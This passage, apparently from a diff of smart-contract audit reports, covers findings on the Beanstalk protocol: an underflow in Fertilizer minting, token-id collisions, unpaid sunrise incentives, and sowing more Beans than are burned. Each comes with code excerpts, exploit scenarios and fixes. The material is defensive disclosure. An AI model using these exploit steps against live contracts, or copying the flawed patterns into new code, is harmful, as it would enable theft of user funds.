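    require(msg.sender == s.ownerCandidate, "Ownership: sender is not the candidate");
    LibDiamond.setContractOwner(s.ownerCandidate);
    s.ownerCandidate = address(0);
}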
Long term, identify and document all possible actions that can be taken by privileged accounts and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.

+3. Possible underflow could allow more Fertilizer than MAX_RAISE to be minted Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-BEANS-003 Target: protocol/contracts/fertilizer/FertilizerPremint.sol Description The remaining() function could underflow, which could allow the Barn Raise to continue indefinitely. Fertilizer is an ERC1155 token issued for participation in the Barn Raise, a community fundraiser intended to recapitalize the Beanstalk protocol with Bean and liquidity provider (LP) tokens that were stolen during the April 2022 governance hack. Fertilizer entitles holders to a pro rata portion of one-third of minted Bean tokens if the Fertilizer token is active, and it can be minted as long as the recapitalization target ($77 million) has not been reached. Users who want to buy Fertilizer call the mint() function and provide one USDC for each Fertilizer token they want to mint.

function mint(uint256 amount) external payable nonReentrant {
    uint256 r = remaining();
    if (amount > r) amount = r;
    __mint(amount);
    IUSDC.transferFrom(msg.sender, CUSTODIAN, amount);
}

Figure 3.1: The mint() function in FertilizerPremint.sol#L51-56 The mint() function first checks how many Fertilizer tokens remain to be minted by calling the remaining() function (figure 3.2); if the user is trying to mint more Fertilizer than available, the mint() function mints all of the Fertilizer tokens that remain.

function remaining() public view returns (uint256) {
    return MAX_RAISE - IUSDC.balanceOf(CUSTODIAN);
}

Figure 3.2: The remaining() function in FertilizerPremint.sol#L84- However, the FertilizerPremint contract does not use Solidity 0.8, so it does not have native overflow and underflow protection. As a result, if the amount of Fertilizer purchased reaches MAX_RAISE (i.e., 77 million), an attacker could simply send one USDC to the CUSTODIAN wallet to cause the remaining() function to underflow, allowing the sale to continue indefinitely. In this particular case, Beanstalk protocol funds are not at risk because all the USDC used to purchase Fertilizer tokens is sent to a Beanstalk community-owned multisignature wallet; however, users who buy Fertilizer after such an exploit would lose the gas funds they spent, and the project would incur further reputational damage. Exploit Scenario The Barn Raise is a total success: the MAX_RAISE amount is hit, meaning that 77 million Fertilizer tokens have been minted. Alice, a malicious user, notices the underflow risk in the remaining() function; she sends one USDC to the CUSTODIAN wallet, triggering the underflow and causing the function to return the max uint256 instead of MAX_RAISE. As a result, the sale continues even though the MAX_RAISE amount was reached. Other users, not knowing that the Barn Raise should be complete, continue to successfully mint Fertilizer tokens until the bug is discovered and the system is paused to address the issue. While no Beanstalk funds are lost as a result of this exploit, the users who continued minting Fertilizer after the MAX_RAISE was reached lose all the gas funds they spent. Recommendations Short term, add a check in the remaining() function so that it returns 0 if USDC.balanceOf(CUSTODIAN) is greater than or equal to MAX_RAISE. This will prevent the underflow from being triggered.
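A minimal sketch of that guard (same function, with an explicit bounds check in place of the unchecked subtraction):

function remaining() public view returns (uint256) {
    uint256 raised = IUSDC.balanceOf(CUSTODIAN);
    // If the custodian balance already meets or exceeds the target, nothing
    // remains to be minted; this avoids the pre-0.8 underflow.
    if (raised >= MAX_RAISE) return 0;
    return MAX_RAISE - raised;
}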
Because the function depends on the CUSTODIAN's balance, it is still possible for someone to send USDC directly to the CUSTODIAN wallet and reduce the amount of "available" Fertilizer; however, attackers would lose their money in the process, meaning that there are no incentives to perform this kind of action. Long term, thoroughly document the expected behavior of the FertilizerPremint contract and the properties (invariants) it should enforce, such as "no tokens can be minted once the MAX_RAISE is reached." Expand the unit test suite to test that these properties hold.

+4. Risk of Fertilizer id collision that could result in loss of funds Severity: High Difficulty: Low Type: Data Validation Finding ID: TOB-BEANS-004 Target: protocol/contracts/fertilizer/Fertilizer.sol Description If a user mints Fertilizer tokens twice during two different seasons, the same token id could be calculated for both tokens, and the first entry will be overridden; if this occurs and the bpf value changes, the user would be entitled to less yield than expected. To mint new Fertilizer tokens, users call the mintFertilizer() function in the FertilizerFacet contract. An id is calculated for each new Fertilizer token that is minted; not only is this id an identifier for the token, but it also represents the endBpf period, which is the moment at which the Fertilizer reaches "maturity" and can be redeemed without incurring any penalty.

function mintFertilizer(
    uint128 amount,
    uint256 minLP,
    LibTransfer.From mode
) external payable {
    uint256 remaining = LibFertilizer.remainingRecapitalization();
    uint256 _amount = uint256(amount);
    if (_amount > remaining) _amount = remaining;
    LibTransfer.receiveToken(
        C.usdc(),
        uint256(amount).mul(1e6),
        msg.sender,
        mode
    );
    uint128 id = LibFertilizer.addFertilizer(
        uint128(s.season.current),
        amount,
        minLP
    );
    C.fertilizer().beanstalkMint(msg.sender, uint256(id), amount, s.bpf);
}

Figure 4.1: The mintFertilizer() function in Fertilizer.sol#L35-55 The id is calculated by the addFertilizer() function in the LibFertilizer library as the sum of 1 and the bpf and humidity values.

function addFertilizer(
    uint128 season,
    uint128 amount,
    uint256 minLP
) internal returns (uint128 id) {
    AppStorage storage s = LibAppStorage.diamondStorage();
    uint256 _amount = uint256(amount);
    // Calculate Beans Per Fertilizer and add to total owed
    uint128 bpf = getBpf(season);
    s.unfertilizedIndex = s.unfertilizedIndex.add(
        _amount.mul(uint128(bpf))
    );
    // Get id
    id = s.bpf.add(bpf);
    [...]
}

function getBpf(uint128 id) internal pure returns (uint128 bpf) {
    bpf = getHumidity(id).add(1000).mul(PADDING);
}

function getHumidity(uint128 id) internal pure returns (uint128 humidity) {
    if (id == REPLANT_SEASON) return 5000;
    if (id >= END_DECREASE_SEASON) return 200;
    uint128 humidityDecrease = id.sub(REPLANT_SEASON + 1).mul(5);
    humidity = RESTART_HUMIDITY.sub(humidityDecrease);
}

Figure 4.2: The id calculation in LibFertilizer.sol#L32-67 However, the method that generates these token ids does not prevent collisions. The bpf value is always increasing (or does not move), and humidity decreases every season until it reaches 20%. This makes it possible for a user to mint two tokens in two different seasons with different bpf and humidity values and still get the same token id.
function beanstalkMint(address account, uint256 id, uint128 amount, uint128 bpf) external onlyOwner {
    _balances[id][account].lastBpf = bpf;
    _safeMint(
        account,
        id,
        amount,
        bytes('0')
    );
}

Figure 4.3: The beanstalkMint() function in Fertilizer.sol#L40-48 An id collision is not necessarily a problem; however, when a token is minted, the value of the lastBpf field is set to the bpf of the current season, as shown in figure 4.3. This field is very important because it is used to determine the penalty, if any, that a user will incur when redeeming Fertilizer. To redeem Fertilizer, users call the claimFertilizer() function, which in turn calls the beanstalkUpdate() function on the Fertilizer contract.

function claimFertilized(uint256[] calldata ids, LibTransfer.To mode)
    external
    payable
{
    uint256 amount = C.fertilizer().beanstalkUpdate(msg.sender, ids, s.bpf);
    LibTransfer.sendToken(C.bean(), amount, msg.sender, mode);
}

Figure 4.4: The claimFertilizer() function in FertilizerFacet.sol#L27-33

function beanstalkUpdate(
    address account,
    uint256[] memory ids,
    uint128 bpf
) external onlyOwner returns (uint256) {
    return __update(account, ids, uint256(bpf));
}

function __update(
    address account,
    uint256[] memory ids,
    uint256 bpf
) internal returns (uint256 beans) {
    for (uint256 i = 0; i < ids.length; i++) {
        uint256 stopBpf = bpf < ids[i] ? bpf : ids[i];
        uint256 deltaBpf = stopBpf - _balances[ids[i]][account].lastBpf;
        if (deltaBpf > 0) {
            beans = beans.add(deltaBpf.mul(_balances[ids[i]][account].amount));
            _balances[ids[i]][account].lastBpf = uint128(stopBpf);
        }
    }
    emit ClaimFertilizer(ids, beans);
}

Figure 4.5: The update flow in Fertilizer.sol#L32-38 and L72-86 The beanstalkUpdate() function then calls the __update() function. This function first calculates the stopBpf value, which is one of two possible values: if the Fertilizer is being redeemed early, stopBpf is the bpf at which the Fertilizer is being redeemed; if the token is being redeemed at "maturity" or later, stopBpf is the token id (i.e., the endBpf value). Afterward, __update() calculates the deltaBpf value, which is used to determine the penalty, if any, that the user will incur when redeeming the token; deltaBpf is calculated using the stopBpf value that was already defined and the lastBpf value, which is the bpf corresponding to the last time the token was redeemed or, if it was never redeemed, the bpf at the moment the token was minted. Finally, the token's lastBpf field is updated to the stopBpf. Because of the id collision, users could accidentally mint Fertilizer tokens with the same id in two different seasons and override their first mint's lastBpf field, ultimately reducing the amount of yield they are entitled to. Exploit Scenario Imagine the following scenario: • It is currently the first season; the bpf is 0 and the humidity is 40%. Alice mints 100 Fertilizer tokens with an id of 41 (the sum of 1 and the bpf (0) and humidity (40) values), and lastBpf is set to 0. • Some time goes by, and it is now the third season; the bpf is 35 and the humidity is 5%. Alice mints one additional Fertilizer token with an id of 41 (the sum of 1 and the bpf (35) and humidity (5) values), and lastBpf is set to 35.
Because of the second mint, the lastBpf field of Alice's Fertilizer tokens is overridden, making her lose a substantial amount of the yield she was entitled to: • Using the formula for calculating the number of BEAN tokens that users are entitled to, shown in figure 4.5, Alice's original yield at "maturity" would have been 4,100 tokens: ○ deltaBpf = id - lastBpf = 41 - 0 = 41 ○ balance = 100 ○ beans received = deltaBpf * balance = 41 * 100 = 4100 • As a result of the overridden lastBpf field, Alice's yield instead ends up being only 606 tokens: ○ deltaBpf = id - lastBpf = 41 - 35 = 6 ○ balance = 101 ○ beans received = deltaBpf * balance = 6 * 101 = 606 Recommendations Short term, separate the role of the id into two separate variables for the token index and endBpf. That way, the index can be optimized to prevent collisions, while endBpf can accurately represent the data it needs to represent. Alternatively, modify the relevant code so that when an id collision occurs, it either reverts or redeems the previous Fertilizer first before minting the new tokens. However, these alternate remedies could introduce new edge cases or could result in a degraded user experience; if either alternate remedy is implemented, it would need to be thoroughly documented to inform the users of its particular behavior. Long term, thoroughly document the expected behavior of the associated code and include regression tests to prevent similar issues from being introduced in the future. Additionally, exercise caution when using one variable to serve two purposes. Gas savings should be measured and weighed against the increased complexity. Developers should be aware that performing optimizations could introduce new edge cases and increase the code's complexity.

+5. The sunrise() function rewards callers only with the base incentive Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-BEANS-005 Target: protocol/contracts/farm/facets/SeasonFacet/SeasonFacet.sol Description The increasing incentive that encourages users to call the sunrise() function in a timely manner is not actually applied. According to the Beanstalk white paper, the reward paid to users who call the sunrise() function should increase by 1% every second (for up to 300 seconds) after this method is eligible to be called; this incentive is designed so that, even when gas prices are high, the system can move on to the next season in a timely manner. This increasing incentive is calculated and included in the emitted logs, but it is not actually applied to the number of Bean tokens rewarded to users who call sunrise().

function incentivize(address account, uint256 amount) private {
    uint256 timestamp = block.timestamp.sub(
        s.season.start.add(s.season.period.mul(season()))
    );
    if (timestamp > 300) timestamp = 300;
    uint256 incentive = LibIncentive.fracExp(amount, 100, timestamp, 1);
    C.bean().mint(account, amount);
    emit Incentivization(account, incentive);
}

Figure 5.1: The incentive calculation in SeasonFacet.sol#70-78 Exploit Scenario Gas prices suddenly increase to the point that it is no longer profitable to call sunrise(). Given the lack of an increasing incentive, the function goes uncalled for several hours, preventing the system from reacting to changing market conditions. Recommendations Short term, pass the incentive value instead of amount into the mint() function call.
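That is, a one-line change (sketch):

function incentivize(address account, uint256 amount) private {
    ...
    uint256 incentive = LibIncentive.fracExp(amount, 100, timestamp, 1);
-   C.bean().mint(account, amount);
+   C.bean().mint(account, incentive); // pay the escalating incentive, not the base amount
    emit Incentivization(account, incentive);
}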
Long term, thoroughly document the expected behavior of the SeasonFacet contract and the properties (invariants) it should enforce, such as "the caller of the sunrise() function receives the right incentive." Expand the unit test suite to test that these properties hold. Additionally, thoroughly document how the system would be affected if the sunrise() function were not called for a long period of time (e.g., in times of extreme network congestion). Finally, determine whether the Beanstalk team should rely exclusively on third parties to call the sunrise() function or whether an alternate system managed by the Beanstalk team should be adopted in addition to the current system. For example, an alternate system could involve an off-chain monitoring system and a trusted execution flow.

+6. Solidity compiler optimizations can be problematic Severity: Informational Difficulty: Low Type: Undefined Behavior Finding ID: TOB-BEANS-006 Target: The Beanstalk protocol Description Beanstalk has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations (or in the Emscripten transpilation to solc-js) causes a security vulnerability in the Beanstalk contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.

+7. Lack of support for external transfers of nonstandard ERC20 tokens Severity: Informational Difficulty: Low Type: Data Validation Finding ID: TOB-BEANS-007 Target: protocol/contracts/farm/facets/TokenFacet.sol Description For external transfers of nonstandard ERC20 tokens via the TokenFacet contract, the code uses the standard transferFrom operation from the given token contract without checking the operation's returndata; as a result, successfully executed transactions that fail to transfer tokens will go unnoticed, causing confusion in users who believe their funds were successfully transferred. The TokenFacet contract exposes transferToken(), an external function that users can call to transfer ERC20 tokens both to and from the contract and between users.
function transferToken( IERC20 token, address recipient, uint256 amount, LibTransfer.From fromMode, LibTransfer.To toMode ) external payable { LibTransfer.transferToken(token, recipient, amount, fromMode, toMode); } Figure 7.1: The transferToken() function in TokenFacet.sol#L39-47 This function calls the LibTransfer library, which handles the token transfer. function transferToken( IERC20 token, address recipient, uint256 amount, From fromMode, To toMode ) internal returns (uint256 transferredAmount) { if (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) { token.transferFrom(msg.sender, recipient, amount); return amount; } amount = receiveToken(token, amount, msg.sender, fromMode); sendToken(token, amount, recipient, toMode); return amount; } Figure 7.2: The transferToken() function in LibTransfer.sol#L29-43 The LibTransfer library uses the fromMode and toMode values to determine a transfer’s sender and receiver, respectively; in most cases, it uses the safeERC20 library to execute transfers. However, if fromMode and toMode are both marked as EXTERNAL , then the transferFrom function of the token contract will be called directly, and safeERC20 will not be used. Essentially, if a user tries to transfer a nonstandard ERC20 token that does not revert on failure and instead indicates a transaction’s success or failure in its return data, the user could be led to believe that failed token transfers were successful. Exploit Scenario Alice uses the TokenFacet contract to transfer nonstandard ERC20 tokens that return false on failure to another contract. However, Alice accidentally inputs an amount higher than her balance. The transaction is successfully executed, but because there is no check of the false return value, Alice does not know that her tokens were not transferred. Recommendations Short term, use the safeERC20 library for external token transfers. Long term, thoroughly review and document all interactions with arbitrary tokens to prevent similar issues from being introduced in the future. +8. Plot transfers from users with allowances revert if the owner has an existing pod listing Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-BEANS-008 Target: protocol/contracts/farm/facets/MarketplaceFacet.sol Description Whenever a plot transfer is executed by a user with an allowance (i.e., a transfer in which the caller was approved by the plot’s owner), the transfer will revert if there is an existing listing for the pods contained in that plot. The MarketplaceFacet contract exposes a function, transferPlot() , that allows the owner of a plot to transfer the pods in that plot to another user; additionally, the owner of a plot can call the approvePods() function (figure 8.1) to approve other users to transfer these pods on the owner’s behalf. function approvePods(address spender, uint256 amount) external payable nonReentrant { require(spender != address(0), "Field: Pod Approve to 0 address."); setAllowancePods(msg.sender, spender, amount); emit PodApproval(msg.sender, spender, amount); } Figure 8.1: The approvePods() function in MarketplaceFacet.sol#L147-155 Once approved, the given address can call the transferPlot() function to transfer pods on the owner’s behalf. The function checks and decreases the allowance and then checks whether there is an existing pod listing for the target pods. If there is an existing listing, the function tries to cancel it by calling the _cancelPodListing() function.
function transferPlot( address sender, address recipient, uint256 id, uint256 start, uint256 end ) external payable nonReentrant { require( sender != address(0) && recipient != address(0), "Field: Transfer to/from 0 address." ); uint256 amount = s.a[sender].field.plots[id]; require(amount > 0, "Field: Plot not owned by user."); require(end > start && amount >= end, "Field: Pod range invalid."); amount = end - start; // Note: SafeMath is redundant here. if ( msg.sender != sender && allowancePods(sender, msg.sender) != uint256(-1) ) { decrementAllowancePods(sender, msg.sender, amount); } if (s.podListings[id] != bytes32(0)) { _cancelPodListing(id); // TODO: Look into this cancelling. } _transferPlot(sender, recipient, id, start, amount); } Figure 8.2: The transferPlot() function in MarketplaceFacet.sol#L119-145 The _cancelPodListing() function receives only an id as the input and relies on the msg.sender to determine the listing’s owner. However, if the transfer is executed by a user with an allowance, the msg.sender is the user who was granted the allowance, not the owner of the listing. As a result, the function will revert. function _cancelPodListing(uint256 index) internal { require( s.a[msg.sender].field.plots[index] > 0, "Marketplace: Listing not owned by sender." ); delete s.podListings[index]; emit PodListingCancelled(msg.sender, index); } Figure 8.3: The _cancelPodListing() function in Listing.sol#L149-156 Exploit Scenario A new smart contract that integrates with the MarketplaceFacet contract is deployed. This contract has features allowing it to manage users’ pods on their behalf. Alice approves the contract so that it can manage her pods. Some time passes, and Alice calls one of the smart contract’s functions, which requires Alice to transfer ownership of her plot to the contract. Because Alice has already approved the smart contract, it can perform the transfer on her behalf. To do so, it calls the transferPlot() function in the MarketplaceFacet contract; however, this call reverts because Alice has an open listing for the pods that the contract is trying to transfer. Recommendations Short term, add a new input to _cancelPodListing() that is equal to msg.sender if the caller is the owner of the listing, but equal to the pod owner if the caller is a user who was approved by the owner. Long term, thoroughly document the expected behavior of the MarketplaceFacet contract and the properties (invariants) it should enforce, such as “plot transfers initiated by users with an allowance cancel the owner’s listing.” Expand the unit test suite to test that these properties hold. +9. Users can sow more Bean tokens than are burned Severity: High Difficulty: Low Type: Data Validation Finding ID: TOB-BEANS-009 Target: protocol/contracts/farm/facets/FieldFacet.sol Description An accounting error allows users to sow more Bean tokens than the available soil allows. Whenever the price of Bean is below its peg, the protocol issues soil. Soil represents the willingness of the protocol to take Bean tokens off the market in exchange for a pod. Essentially, Bean owners loan their tokens to the protocol and receive pods in exchange. We can think of pods as non-callable bonds that mature on a first-in-first-out (FIFO) basis as the protocol issues new Bean tokens. Whenever soil is available, users can call the sow() and sowWithMin() functions in the FieldFacet contract. 
function sowWithMin( uint256 amount, uint256 minAmount, LibTransfer.From mode ) public payable returns (uint256) { uint256 sowAmount = s.f.soil; require( sowAmount >= minAmount && amount >= minAmount && minAmount > 0, "Field: Sowing below min or 0 pods." ); if (amount < sowAmount) sowAmount = amount; return _sow(sowAmount, mode); } Figure 9.1: The sowWithMin() function in FieldFacet.sol#L41-53 The sowWithMin() function ensures that there is enough soil to sow the given number of Bean tokens and that the call will not sow fewer tokens than the specified minAmount . Once it makes these checks, it calls the _sow() function. function _sow(uint256 amount, LibTransfer.From mode) internal returns (uint256 pods) { pods = LibDibbler.sow(amount, msg.sender); if (mode == LibTransfer.From.EXTERNAL) C.bean().burnFrom(msg.sender, amount); else { amount = LibTransfer.receiveToken(C.bean(), amount, msg.sender, mode); C.bean().burn(amount); } } Figure 9.2: The _sow() function in FieldFacet.sol#L55-65 The _sow() function first calculates the number of pods that will be sown by calling the sow() function in the LibDibbler library, which performs the internal accounting and calculates the number of pods that the user is entitled to. function sow(uint256 amount, address account) internal returns (uint256) { AppStorage storage s = LibAppStorage.diamondStorage(); // We can assume amount <= soil from getSowAmount s.f.soil = s.f.soil - amount; return sowNoSoil(amount, account); } function sowNoSoil(uint256 amount, address account) internal returns (uint256) { AppStorage storage s = LibAppStorage.diamondStorage(); uint256 pods = beansToPods(amount, s.w.yield); sowPlot(account, amount, pods); s.f.pods = s.f.pods.add(pods); saveSowTime(); return pods; } function sowPlot( address account, uint256 beans, uint256 pods ) private { AppStorage storage s = LibAppStorage.diamondStorage(); s.a[account].field.plots[s.f.pods] = pods; emit Sow(account, s.f.pods, beans, pods); } Figure 9.3: The sow() , sowNoSoil() , and sowPlot() functions in LibDibbler.sol#L41-53 Finally, the sowWithMin() function burns the Bean tokens from the caller’s account, removing them from the supply. To do so, the function calls burnFrom() if the mode parameter is EXTERNAL (i.e., if the Bean tokens to be burned are not escrowed in the contract) and burn() if the Bean tokens are escrowed. If the mode parameter is not EXTERNAL , the receiveToken() function is executed to update the internal accounting of the contract before burning the tokens. This function returns the number of tokens that were “transferred” into the contract. In essence, the receiveToken() function allows the contract to correctly account for token transfers into it and to manage internal balances without performing token transfers.
function receiveToken( IERC20 token, uint256 amount, address sender, From mode ) internal returns (uint256 receivedAmount) { if (amount == 0) return 0; if (mode != From.EXTERNAL) { receivedAmount = LibBalance.decreaseInternalBalance( sender, token, amount, mode != From.INTERNAL ); if (amount == receivedAmount || mode == From.INTERNAL_TOLERANT) return receivedAmount; } token.safeTransferFrom(sender, address(this), amount - receivedAmount); return amount; } Figure 9.4: The receiveToken() function in FieldFacet.sol#L41-53 However, if the mode parameter is INTERNAL_TOLERANT , the contract allows the user to partially fill amount (i.e., to transfer as much as the user can), which means that if the user does not own the given amount of Bean tokens, the protocol simply burns as many tokens as the user owns but still allows the user to sow the full amount . Exploit Scenario Eve, a malicious user, spots the vulnerability in the FieldFacet contract and waits until Bean is below its peg and the protocol starts issuing soil. Bean finally goes below its peg, and the protocol issues 1,000 soil. Eve deposits a single Bean token into the contract by calling the transferToken() function in the TokenFacet contract. She then calls the sow() function with amount equal to 1000 and mode equal to INTERNAL_TOLERANT . The sow() function is executed, sowing 1,000 Bean tokens but burning only a single token. Recommendations Short term, modify the relevant code so that users’ Bean tokens are burned before the accounting for the soil and pods is updated and so that, if the mode field is not EXTERNAL , the amount returned by receiveToken() is used as the input to LibDibbler.sow() . Long term, thoroughly document the expected behavior of the FieldFacet contract and the properties (invariants) it should enforce, such as “the sow() function always sows as many Bean tokens as were burned.” Expand the unit test suite to test that these properties hold. +10. Pods may never ripen Severity: Undetermined Difficulty: Undetermined Type: Economic Finding ID: TOB-BEANS-010 Target: The Beanstalk protocol Description Whenever the price of Bean is below its peg, the protocol takes Bean tokens off the market in exchange for a number of pods dependent on the current interest rate. Essentially, Bean owners loan their tokens to the protocol and receive pods in exchange. We can think of pods as loans that are repaid on a FIFO basis as the protocol issues new Bean tokens. A group of pods that are created together is called a plot. The queue of plots is referred to as the pod line. The pod line has no practical bound on its length, so during periods of decreasing demand, it can grow indefinitely. No yield is awarded until the given plot owner is first in line and until the price of Bean is above its value peg. While the protocol does not default on its debt, the only way for pods to ripen is if demand increases enough for the price of Bean to be above its value peg for some time. While the price of Bean is above its peg, a portion of newly minted Bean tokens is used to repay the first plot in the pod line until fully repaid, decreasing the length of the pod line. During an extended period of decreasing supply, the pod line could grow long enough that lenders receive an unappealing time-weighted rate of return, even if the yield is increased; a sufficiently long pod line could encourage users—uncertain of whether future demand will grow enough for them to be repaid—to sell their Bean tokens rather than lending them to the protocol.
Under such circumstances, the protocol will be unable to disincentivize Bean market sales, disrupting its ability to return Bean to its value peg. Exploit Scenario Bean goes through an extended period of increasing demand, overextending its supply. Then, demand for Bean tokens slowly and steadily declines, and the pod line grows in length. At a certain point, some users decide that their time-weighted rate of return is unfavorable or too uncertain despite the promised high yields. Instead of lending their Bean tokens to the protocol, they sell. Recommendations Explore options for backing Bean’s value with an offer that is guaranteed to eventually be fulfilled. 11. Bean and the offer backing it are strongly correlated Severity: Undetermined Difficulty: Undetermined Type: Economic Finding ID: TOB-BEANS-011 Target: The Beanstalk protocol Description In response to prolonged periods of decreasing demand for Bean tokens, the Beanstalk protocol offers to borrow from users who own Bean tokens, decreasing the available Bean supply and returning the Bean price to its peg. To incentivize users to lend their Bean tokens to the protocol rather than immediately selling them in the market, which would put further downward pressure on the price of Bean , the protocol offers users a reward of more Bean tokens in the future. The demand for holding Bean tokens at present and the demand for receiving Bean tokens in the future are strongly correlated, introducing reflexive risk. If the demand for Bean decreases, we can expect a proportional increase in the marginal Bean supply and a decrease in demand to receive Bean in the future, weakening the system’s ability to restore Bean to its value peg. The FIFO queue of lenders is designed to combat reflexivity by encouraging rational actors to quickly support a dip in Bean price rather than selling. However, this mechanism assumes that the demand for Bean will increase in the future; investors may not share this assumption if present demand for Bean is low. Reflexivity is present whenever a stablecoin and the offer backing it are strongly correlated, even if the backing offer is time sensitive. Exploit Scenario Bean goes through an extended period of increasing demand, overextending its supply. Then, the demand for Bean slowly and steadily declines as some users lose interest in holding Bean . These same users also lose interest in receiving Bean tokens in the future, so rather than loaning their tokens to Beanstalk to earn a very high Bean -denominated yield, they sell. Recommendations Explore options for backing Bean’s value with an offer that is not correlated with demand for Bean . 12. Ability to whitelist assets uncorrelated with Bean price, misaligning governance incentives Severity: Undetermined Difficulty: Undetermined Type: Economic Finding ID: TOB-BEANS-012 Target: The Beanstalk protocol Description Stalk is the governance token of the system, rewarded to users who deposit certain whitelisted assets into the silo, the system’s asset storage. When demand for Bean increases, the protocol increases the Bean supply by minting new Bean tokens and allocating some of them to Stalk holders. Additionally, if the price of Bean remains above its peg for an extended period of time, then a season of plenty (SoP) occurs: Bean is minted and sold on the open market in exchange for exogenous assets such as ETH. These exogenous assets are allocated entirely to Stalk holders.
When demand for Bean decreases, the protocol decreases the Bean supply by borrowing Bean tokens from Bean owners. If the demand for Bean is persistently low and some of these loans are never repaid, Stalk holders are not directly penalized by the protocol. However, if the only whitelisted assets are strongly correlated with the price of Bean (such as ETH:BEAN LP tokens), then the value of Stalk holders’ deposited collateral would decline, indirectly penalizing Stalk holders for an unhealthy system. If, however, exogenous assets without a strong correlation to Bean are whitelisted, then Stalk holders who have deposited such assets will be protected from financial penalties if the price of Bean crashes. Exploit Scenario Stalk holders vote to whitelist ETH as a depositable asset. They proceed to deposit ETH and begin receiving shares of rewards, including 3CRV tokens acquired during SoPs. Governance is now incentivized to increase the supply of Bean as high as possible to obtain more 3CRV rewards, which eventually results in an overextension of the Bean supply and a subsequent price crash. After the Bean price crashes, Stalk holders withdraw their deposited ETH and 3CRV rewards. Because ETH is not strongly correlated with the price of Bean, they do not suffer financial loss as a result of the crash. Alternatively, because of the lack of on-chain enforcement of off-chain votes, the above scenario could occur if the community multisignature wallet whitelists ETH, even if no related vote occurred. Recommendations Do not allow any assets that are not strongly correlated with the price of Bean to be whitelisted. Additionally, implement monitoring systems that provide alerts every time a new asset is whitelisted. 13. Unchecked burnFrom return value Severity: Informational Difficulty: Undetermined Type: Undefined Behavior Finding ID: TOB-BEANS-013 Target: protocol/contracts/farm/facets/UnripeFacet.sol Description While recapitalizing the Beanstalk protocol, Bean and LP tokens that existed before the 2022 governance hack are represented as unripe tokens. Ripening is the process of burning unripe tokens in exchange for a pro rata share of the underlying assets generated during the Barn Raise. Holders of unripe tokens call the ripen function to receive their portion of the recovered underlying assets. This portion grows while the price of Bean is above its peg, incentivizing users to ripen their tokens later, when more of the loss has been recovered. The ripen code assumes that if users try to redeem more unripe tokens than they hold, burnFrom will revert. If burnFrom returns false instead of reverting, the failure of the balance check will go undetected, and the caller will be able to recover all of the underlying tokens held by the contract. While LibUnripe.decrementUnderlying will revert on calls to ripen more than the contract’s balance, it does not check the user’s balance. The source code of the unripeToken contract was not provided for review during this audit, so we could not determine whether its burnFrom method is implemented safely. 
function ripen( address unripeToken, uint256 amount, LibTransfer.To mode ) external payable nonReentrant returns (uint256 underlyingAmount) { underlyingAmount = getPenalizedUnderlying(unripeToken, amount); LibUnripe.decrementUnderlying(unripeToken, underlyingAmount); IBean(unripeToken).burnFrom(msg.sender, amount); address underlyingToken = s.u[unripeToken].underlyingToken; IERC20(underlyingToken).sendToken(underlyingAmount, msg.sender, mode); emit Ripen(msg.sender, unripeToken, amount, underlyingAmount); } Figure 13.1: The ripen() function in UnripeFacet.sol#L51- Exploit Scenario Alice notices that the burnFrom function is implemented incorrectly in the unripeToken contract. She calls ripen with an amount greater than her unripe token balance and is able to receive the contract’s entire balance of underlying tokens. Recommendations Short term, add an assert statement to ensure that users who call ripen have sufficient balance to burn the given amount of unripe tokens. Long term, implement all security-critical assertions on user-supplied input in the beginning of external functions. Do not rely on untrusted code to perform required safety checks or to behave as expected.
diff --git a/findings_newupdate/2022-07-mobilecoin-securityreview.txt b/findings_newupdate/tob/2022-07-mobilecoin-securityreview.txt similarity index 100% rename from findings_newupdate/2022-07-mobilecoin-securityreview.txt rename to findings_newupdate/tob/2022-07-mobilecoin-securityreview.txt diff --git a/findings_newupdate/2022-09-aleosystems-snarkvm-securityreview.txt b/findings_newupdate/tob/2022-09-aleosystems-snarkvm-securityreview.txt similarity index 100% rename from findings_newupdate/2022-09-aleosystems-snarkvm-securityreview.txt rename to findings_newupdate/tob/2022-09-aleosystems-snarkvm-securityreview.txt diff --git a/findings_newupdate/2022-09-alphasoc-alphasocapi-securityreview.txt b/findings_newupdate/tob/2022-09-alphasoc-alphasocapi-securityreview.txt similarity index 100% rename from findings_newupdate/2022-09-alphasoc-alphasocapi-securityreview.txt rename to findings_newupdate/tob/2022-09-alphasoc-alphasocapi-securityreview.txt diff --git a/findings_newupdate/2022-09-incrementprotocol-securityreview.txt b/findings_newupdate/tob/2022-09-incrementprotocol-securityreview.txt similarity index 100% rename from findings_newupdate/2022-09-incrementprotocol-securityreview.txt rename to findings_newupdate/tob/2022-09-incrementprotocol-securityreview.txt diff --git a/findings_newupdate/2022-09-maplefinance-mapleprotocolv2-securityreview.txt b/findings_newupdate/tob/2022-09-maplefinance-mapleprotocolv2-securityreview.txt similarity index 100% rename from findings_newupdate/2022-09-maplefinance-mapleprotocolv2-securityreview.txt rename to findings_newupdate/tob/2022-09-maplefinance-mapleprotocolv2-securityreview.txt diff --git a/findings_newupdate/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.txt b/findings_newupdate/tob/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.txt similarity index 100% rename from findings_newupdate/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.txt rename to findings_newupdate/tob/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.txt diff --git a/findings_newupdate/2022-10-GSquared-securityreview.txt b/findings_newupdate/tob/2022-10-GSquared-securityreview.txt similarity index 100% rename from 